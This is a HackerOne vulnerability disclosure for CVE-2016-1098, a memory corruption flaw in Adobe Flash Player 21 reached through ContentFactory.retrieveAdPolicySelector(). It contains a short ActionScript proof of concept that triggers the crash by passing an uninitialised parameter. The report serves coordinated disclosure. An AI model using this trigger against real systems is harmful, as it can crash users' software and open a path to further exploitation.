Flash (IBB): Adobe Flash Player ContentFactory class Memory Corruption Vulnerability

2016-05-13T01:10:41
ID H1:138516
Type hackerone
Reporter hhj4ck
Modified 2019-11-12T09:42:44

Description

I. Summary Adobe Flash Player is prone to a vulnerability which leads to memory corruption because of improper validation of ContentFactory.retrieveAdPolicySelector().


II. Description Adobe Flash is a multimedia and software platform used for authoring of vector graphics, animation, games and rich Internet applications (RIAs) that can be viewed, played and executed in Adobe Flash Player.

Normally, retrieveAdPolicySelector() should validates its parameter and returns error in AS3 level if anything goes wrong. If retrieveAdPolicySelector() function is invoked directly with invalid parameter, some inner class instance will be absent, which will cause a memory crash.

POC Source Code:

package { import com.adobe.tvsdk.mediacore.ContentFactory; import com.adobe.tvsdk.mediacore.MediaPlayerItem; import com.adobe.tvsdk.mediacore.PSDK;
import flash.display.Sprite;

public class poc extends Sprite
{
    public function poc()
    {
        var ps:PSDK = PSDK.pSDK;
        var mt:MediaPlayerItem;
        var obj:ContentFactory = ps.createDefaultContentFactory();
        obj.retrieveAdPolicySelector(mt);
    }
}

}

III. Impact Memory Corruption


IV. Affected Adobe Flash Player 21.


V. Credit Wen Guanxing from Pangu LAB is credited for this vulnerability.

It has been assigned as CVE-2016-1098 by Adobe: https://helpx.adobe.com/security/products/flash-player/apsb16-15.html